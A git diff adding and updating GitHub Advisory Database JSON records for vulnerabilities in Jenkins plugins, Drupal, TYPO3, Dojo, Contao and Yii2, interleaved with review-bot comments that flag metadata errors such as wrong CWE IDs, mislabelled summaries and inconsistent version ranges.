"CWE-200", + "CWE-732" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:46:14Z", + "nvd_published_at": "2020-04-29T16:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-m2p5-fwp2-qcw2/GHSA-m2p5-fwp2-qcw2.json b/advisories/github-reviewed/2022/05/GHSA-m2p5-fwp2-qcw2/GHSA-m2p5-fwp2-qcw2.json index 035ac7f75eabb..5e4f96a9578c9 100644 --- a/advisories/github-reviewed/2022/05/GHSA-m2p5-fwp2-qcw2/GHSA-m2p5-fwp2-qcw2.json +++ b/advisories/github-reviewed/2022/05/GHSA-m2p5-fwp2-qcw2/GHSA-m2p5-fwp2-qcw2.json @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "yiisoft/yii2-elasticsearch" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.0.5" + } + ] + } + ] } ], "references": [ @@ -40,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-8074" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/yiisoft/yii2-elasticsearch/CVE-2018-8074.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/yiisoft/yii2" }, + { + "type": "WEB", + "url": "https://www.yiiframework.com/news/168/releasing-yii-2-0-15-and-database-extensions-with-security-fixes/" + }, { "type": "WEB", "url": "http://www.yiiframework.com/news/168/releasing-yii-2-0-15-and-database-extensions-with-security-fixes/" diff --git a/advisories/github-reviewed/2022/05/GHSA-m46p-rp8x-x8c4/GHSA-m46p-rp8x-x8c4.json b/advisories/github-reviewed/2022/05/GHSA-m46p-rp8x-x8c4/GHSA-m46p-rp8x-x8c4.json new file mode 100644 index 0000000000000..fd2919447499e --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-m46p-rp8x-x8c4/GHSA-m46p-rp8x-x8c4.json 
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m46p-rp8x-x8c4", + "modified": "2024-01-30T22:28:22Z", + "published": "2022-05-13T01:25:16Z", + "aliases": [ + "CVE-2019-1003081" + ], + "summary": "CSRF vulnerability in Jenkins OpenShift Deployer Plugin", + "details": "A missing permission check in Jenkins OpenShift Deployer Plugin in the DeployApplication.DeployApplicationDescriptor#doCheckLogin form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:openshift-deployer" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.2.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003081" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-981" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:28:13Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-m648-hpf8-qcjw/GHSA-m648-hpf8-qcjw.json b/advisories/github-reviewed/2022/05/GHSA-m648-hpf8-qcjw/GHSA-m648-hpf8-qcjw.json index 76427fea205e6..7a35670ef9a6d 100644 --- a/advisories/github-reviewed/2022/05/GHSA-m648-hpf8-qcjw/GHSA-m648-hpf8-qcjw.json +++ b/advisories/github-reviewed/2022/05/GHSA-m648-hpf8-qcjw/GHSA-m648-hpf8-qcjw.json 
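Review bot: The summary `CSRF vulnerability in Jenkins OpenShift Deployer Plugin` contradicts the record: the details describe a missing permission check, the CWE is 862 and the vector is PR:L/UI:N, all of which make this the authorization sibling of CVE-2019-1003080 rather than a CSRF. Suggest `"summary": "Missing permission check in Jenkins OpenShift Deployer Plugin"`. The details also never state which versions are affected — `1.2.0 and earlier` from the range should appear in the text — and since there is no `fixed` event, say whether a fix exists.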
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m648-hpf8-qcjw", - "modified": "2023-12-20T21:03:22Z", + "modified": "2024-02-06T13:09:44Z", "published": "2022-05-24T19:05:06Z", "aliases": [ "CVE-2020-13663" @@ -9,7 +9,10 @@ "summary": "Drupal Core Cross-Site Request Forgery (CSRF) vulnerability", "details": "Cross Site Request Forgery vulnerability in Drupal Core Form API does not properly handle certain form input from cross-site requests, which can lead to other vulnerabilities.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ { @@ -22,7 +25,45 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "7.0" + "introduced": "8.9.0" + }, + { + "fixed": "8.9.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.0.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.0.0" }, { "fixed": "7.72" @@ -41,7 +82,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "8.8.0" + "introduced": "8.0.0" }, { "fixed": "8.8.8" @@ -53,7 +94,45 @@ { "package": { "ecosystem": "Packagist", - "name": "drupal/core" + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.0.0" + }, + { + "fixed": "7.72" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.8.8" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" }, "ranges": [ { @@ -72,7 +151,7 @@ { "package": { "ecosystem": "Packagist", - "name": "drupal/core" + "name": "drupal/drupal" }, "ranges": [ { 
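Review bot: The `@@ -22,7 +25,45 @@` hunk of GHSA-m648-hpf8-qcjw adds a `drupal/core` entry with `introduced: "7.0.0"` / `fixed: "7.72"`; as far as I know `drupal/core` is the Composer split of the Drupal 8+ `core/` directory and has no 7.x releases on Packagist, so that range can never match an installed version, and the Drupal 7 line is already carried by the `drupal/drupal` 7.0.0–7.72 entry added in the `@@ -53,7 +94,45 @@` hunk. Worth confirming against Packagist and dropping the `drupal/core` 7.x block if that holds. The widening of the 8.x range from `8.8.0` to `8.0.0` in the `@@ -41,7 +82,7 @@` hunk matches the details' scope, and the severity change to `HIGH` in the final hunk is consistent with the added vector (`PR:N/UI:R/S:U/C:H/I:H/A:H`, base 8.8).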
@@ -106,6 +185,14 @@ "type": "WEB", "url": "https://github.com/drupal/core/commit/faf3243c4ce03bbaab386af2b272b363fd0dfddb" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/core/CVE-2020-13663.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/drupal/CVE-2020-13663.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/drupal/core" @@ -119,7 +206,7 @@ "cwe_ids": [ "CWE-352" ], - "severity": "CRITICAL", + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2023-12-20T21:03:22Z", "nvd_published_at": "2021-06-11T16:15:00Z" diff --git a/advisories/github-reviewed/2022/05/GHSA-m68x-cc2f-gr5h/GHSA-m68x-cc2f-gr5h.json b/advisories/github-reviewed/2022/05/GHSA-m68x-cc2f-gr5h/GHSA-m68x-cc2f-gr5h.json new file mode 100644 index 0000000000000..6f0976e564a35 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-m68x-cc2f-gr5h/GHSA-m68x-cc2f-gr5h.json 
@@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m68x-cc2f-gr5h", + "modified": "2024-01-30T22:46:07Z", + "published": "2022-05-13T01:40:54Z", + "aliases": [ + "CVE-2017-1000095" + ], + "summary": "Unsafe methods in the default list of approved signatures in Jenkins Script Security Plugin", + "details": "The default whitelist included the following unsafe entries: DefaultGroovyMethods.putAt(Object, String, Object); DefaultGroovyMethods.getAt(Object, String). These allowed circumventing many of the access restrictions implemented in the script sandbox by using e.g. currentBuild['rawBuild'] rather than currentBuild.rawBuild. Additionally, the following entries allowed accessing private data that would not be accessible otherwise due to script security: groovy.json.JsonOutput.toJson(Closure); groovy.json.JsonOutput.toJson(Object).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:script-security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.29.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.29" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000095" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-07-10/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:46:07Z", + "nvd_published_at": "2017-10-05T01:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-m7rg-85g8-28m9/GHSA-m7rg-85g8-28m9.json b/advisories/github-reviewed/2022/05/GHSA-m7rg-85g8-28m9/GHSA-m7rg-85g8-28m9.json new file mode 100644 index 0000000000000..ba7cf4c804af6 --- /dev/null 
+++ b/advisories/github-reviewed/2022/05/GHSA-m7rg-85g8-28m9/GHSA-m7rg-85g8-28m9.json 
@@ -0,0 +1,143 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m7rg-85g8-28m9", + "modified": "2024-02-08T21:57:47Z", + "published": "2022-05-02T03:47:10Z", + "aliases": [ + "CVE-2009-3633" + ], + "summary": "TYPO3 API function vulnerable to Cross-site Scripting", + "details": "Cross-site scripting (XSS) vulnerability in the `t3lib_div::quoteJSvalue` API function in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the sanitizing algorithm.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "4.0.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.1.0" + }, + { + "fixed": "4.1.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3alpha1" + }, + { + "fixed": "4.3beta2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3633" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/51f3dd9804cae04575323b92a9136e5a511fe810" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/5d4218fad3aeda46236754004232d7e635205e7a" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/ef9ab2da76c2506306d835209d2a38195bdf7bcf" + }, + { + "type": "WEB", + "url": 
"https://exchange.xforce.ibmcloud.com/vulnerabilities/53925" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/core" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20101223093042/http://www.securityfocus.com/bid/36801" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=125632856206736&w=2" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=125633199111438&w=2" + }, + { + "type": "WEB", + "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-016/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T21:57:47Z", + "nvd_published_at": "2009-11-02T15:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-m8x6-6r63-qvj2/GHSA-m8x6-6r63-qvj2.json b/advisories/github-reviewed/2022/05/GHSA-m8x6-6r63-qvj2/GHSA-m8x6-6r63-qvj2.json index 8fb0eeccde0e8..a2962b82040e6 100644 --- a/advisories/github-reviewed/2022/05/GHSA-m8x6-6r63-qvj2/GHSA-m8x6-6r63-qvj2.json +++ b/advisories/github-reviewed/2022/05/GHSA-m8x6-6r63-qvj2/GHSA-m8x6-6r63-qvj2.json @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.13.0" + }, + { + "fixed": "4.13.3" + } + ] + } + ] } ], "references": [ @@ -52,6 +71,14 @@ "type": "WEB", "url": "https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/contao/CVE-2022-24899.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/core-bundle/CVE-2022-24899.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/contao/contao" 
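Review bot: `cwe_ids` for GHSA-m7rg-85g8-28m9 lists `CWE-352` (CSRF), but the summary, the details and the `t3lib_div::quoteJSvalue` API all describe cross-site scripting, so the classification should be `"CWE-79"`. The `severity` array is empty while `database_specific.severity` is `MODERATE`; that is the usual shape for pre-CVSSv3 advisories in this database, but it means the label is editorial rather than derived from a scored vector. The `4.3alpha1` / `4.3beta2` pre-release strings depend on the Packagist ECOSYSTEM comparator normalising them, so a quick check that the tooling orders `4.3alpha1 < 4.3beta2` as intended would be prudent.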
diff --git a/advisories/github-reviewed/2022/05/GHSA-mg66-3x8x-r8g2/GHSA-mg66-3x8x-r8g2.json b/advisories/github-reviewed/2022/05/GHSA-mg66-3x8x-r8g2/GHSA-mg66-3x8x-r8g2.json new file mode 100644 index 0000000000000..e293353de8058 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-mg66-3x8x-r8g2/GHSA-mg66-3x8x-r8g2.json 
@@ -0,0 +1,127 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mg66-3x8x-r8g2", + "modified": "2024-02-08T21:41:03Z", + "published": "2022-05-02T03:46:56Z", + "aliases": [ + "CVE-2009-3630" + ], + "summary": "TYPO3 Backend vulnerable to Frame Hijacking", + "details": "The Backend subcomponent in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allows remote authenticated users to place arbitrary web sites in TYPO3 backend framesets via crafted parameters, related to a \"frame hijacking\" issue.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "4.0.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.1.0" + }, + { + "fixed": "4.1.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3alpha1" + }, + { + "fixed": "4.3beta2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3630" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53920" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/backend" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20101223093042/http://www.securityfocus.com/bid/36801" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=125632856206736&w=2" + }, + { + "type": "WEB", + "url": 
"http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-016/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T21:41:03Z", + "nvd_published_at": "2009-11-02T15:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-mg72-h5gj-8gg7/GHSA-mg72-h5gj-8gg7.json b/advisories/github-reviewed/2022/05/GHSA-mg72-h5gj-8gg7/GHSA-mg72-h5gj-8gg7.json new file mode 100644 index 0000000000000..1d4e61cbee22f --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-mg72-h5gj-8gg7/GHSA-mg72-h5gj-8gg7.json 
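Review bot: `cwe_ids` for GHSA-mg66-3x8x-r8g2 is an empty array, leaving the advisory unclassified even though the details are specific (remote authenticated users place arbitrary sites in backend framesets via crafted parameters). Frame hijacking of this kind is usually treated as URL injection / open redirect, so `"CWE-601"` looks like the appropriate entry, but the linked TYPO3 bulletin (typo3-sa-2009-016) should be checked before committing to it. The sibling advisory for the same bulletin in this batch (GHSA-m7rg-85g8-28m9) links the TYPO3 fix commits; if the backend fix is part of the same commit set, linking it here as well would help readers locate the patch.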
@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mg72-h5gj-8gg7", + "modified": "2024-01-30T21:24:16Z", + "published": "2022-05-24T16:52:45Z", + "aliases": [ + "CVE-2019-10377" + ], + "summary": "Missing permission check in Jenkins Avatar Plugin", + "details": "A missing permission check in Jenkins Avatar Plugin 1.2 and earlier allows attackers with Overall/Read access to change the avatar of any user of Jenkins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "net.hurstfrost.jenkins:avatar" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 1.2" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10377" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-1099" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:24:16Z", + "nvd_published_at": "2019-08-07T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-mhwq-4mh7-fv7c/GHSA-mhwq-4mh7-fv7c.json b/advisories/github-reviewed/2022/05/GHSA-mhwq-4mh7-fv7c/GHSA-mhwq-4mh7-fv7c.json new file mode 100644 index 0000000000000..565227329bcec --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-mhwq-4mh7-fv7c/GHSA-mhwq-4mh7-fv7c.json 
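Review bot: `last_known_affected_version_range` in GHSA-mg72-h5gj-8gg7 is `"< 1.2"`, which excludes 1.2, while the details say "Avatar Plugin 1.2 and earlier" — the field should read `"last_known_affected_version_range": "<= 1.2"`. The events list has only `introduced: "0"` with neither `fixed` nor `last_affected`, which presents every version as affected with no upper bound; if no fix was released, adding `{ "last_affected": "1.2" }` would make the known scope explicit rather than open-ended, in line with how GHSA-m46p-rp8x-x8c4 in this same batch records an unfixed plugin.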
@@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mhwq-4mh7-fv7c", + "modified": "2024-01-30T22:45:53Z", + "published": "2022-05-13T01:40:55Z", + "aliases": [ + "CVE-2017-1000096" + ], + "summary": "Arbitrary code execution due to incomplete sandbox protection in Jenkins Pipeline", + "details": "Arbitrary code execution due to incomplete sandbox protection: Constructors, instance variable initializers, and instance initializers in Pipeline scripts were not subject to sandbox protection, and could therefore execute arbitrary code. This could be exploited e.g. by regular Jenkins users with the permission to configure Pipelines in Jenkins, or by trusted committers to repositories containing Jenkinsfiles.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins.workflow:workflow-cps" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.36.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.36" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000096" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-07-10/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/99571" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:45:53Z", + "nvd_published_at": "2017-10-05T01:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-mmjh-45vj-hfvf/GHSA-mmjh-45vj-hfvf.json b/advisories/github-reviewed/2022/05/GHSA-mmjh-45vj-hfvf/GHSA-mmjh-45vj-hfvf.json new file mode 100644 index 0000000000000..454f00c75314c --- /dev/null 
+++ b/advisories/github-reviewed/2022/05/GHSA-mmjh-45vj-hfvf/GHSA-mmjh-45vj-hfvf.json 
@@ -0,0 +1,174 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mmjh-45vj-hfvf", + "modified": "2024-02-08T15:49:12Z", + "published": "2022-05-17T05:50:10Z", + "aliases": [ + "CVE-2010-2274" + ], + "summary": "Dojo Open Redirect vulnerability", + "details": "Multiple open redirect vulnerabilities in Dojo 1.0.x before 1.0.3, 1.1.x before 1.1.2, 1.2.x before 1.2.4, 1.3.x before 1.3.3, and 1.4.x before 1.4.2 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors, possibly related to dojo/resources/iframe_history.html, dojox/av/FLAudio.js, dojox/av/FLVideo.js, dojox/av/resources/audio.swf, dojox/av/resources/video.swf, util/buildscripts/jslib/build.js, util/buildscripts/jslib/buildUtil.js, and util/doh/runner.html.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.dojotoolkit:dojo" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.0" + }, + { + "fixed": "1.0.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.dojotoolkit:dojo" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.1.0" + }, + { + "fixed": "1.1.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.dojotoolkit:dojo" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.2.0" + }, + { + "fixed": "1.2.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.dojotoolkit:dojo" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.3.0" + }, + { + "fixed": "1.3.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.dojotoolkit:dojo" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.4.0" + }, + { + "fixed": "1.4.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2274" + }, 
+ { + "type": "PACKAGE", + "url": "https://github.com/cometd/dojo-maven" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20100617172214/http://secunia.com/advisories/40007" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20100629020444/http://secunia.com/advisories/38964" + }, + { + "type": "WEB", + "url": "http://dojotoolkit.org/blog/post/dylan/2010/03/dojo-security-advisory/" + }, + { + "type": "WEB", + "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21431472" + }, + { + "type": "WEB", + "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50833" + }, + { + "type": "WEB", + "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50849" + }, + { + "type": "WEB", + "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50856" + }, + { + "type": "WEB", + "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50896" + }, + { + "type": "WEB", + "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50932" + }, + { + "type": "WEB", + "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50958" + }, + { + "type": "WEB", + "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50994" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-601" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T15:49:12Z", + "nvd_published_at": "2010-06-15T14:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-mmrv-3cqg-hpf9/GHSA-mmrv-3cqg-hpf9.json b/advisories/github-reviewed/2022/05/GHSA-mmrv-3cqg-hpf9/GHSA-mmrv-3cqg-hpf9.json new file mode 100644 index 0000000000000..f8368678770aa --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-mmrv-3cqg-hpf9/GHSA-mmrv-3cqg-hpf9.json 
@@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mmrv-3cqg-hpf9", + "modified": "2024-01-30T22:25:59Z", + "published": "2022-05-13T01:31:35Z", + "aliases": [ + "CVE-2019-1003007" + ], + "summary": "Sandbox Bypass via CSRF in Jenkins Warnings Plugin ", + "details": "A cross-site request forgery vulnerability exists in Jenkins Warnings Plugin 5.0.0 and earlier in src/main/java/hudson/plugins/warnings/GroovyParser.java that allows attackers to execute arbitrary code via a form validation HTTP endpoint.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jvnet.hudson.plugins:warnings" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.0.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 5.0.0" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003007" + }, + { + "type": "PACKAGE", + "url": "https://github.com/jenkinsci/warnings-plugin" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-01-28/#SECURITY-1295%20%281%29" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-01-28/#SECURITY-1295%20(1)" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:25:59Z", + "nvd_published_at": "2019-02-06T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-mqj3-fc39-73fj/GHSA-mqj3-fc39-73fj.json b/advisories/github-reviewed/2022/05/GHSA-mqj3-fc39-73fj/GHSA-mqj3-fc39-73fj.json new file mode 100644 index 0000000000000..39892e40f94c0 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-mqj3-fc39-73fj/GHSA-mqj3-fc39-73fj.json 
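Review bot: The two `jenkins.io` references in GHSA-mmrv-3cqg-hpf9 point at the same anchor, `#SECURITY-1295%20%281%29` and `#SECURITY-1295%20(1)`, differing only in whether the parentheses are percent-encoded, so one of them should be dropped. The `summary` string also carries a trailing space (`"Sandbox Bypass via CSRF in Jenkins Warnings Plugin "`), which will show up in any UI that renders the title verbatim. `fixed: "5.0.1"` and `last_known_affected_version_range: "<= 5.0.0"` are consistent with each other and with the details.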
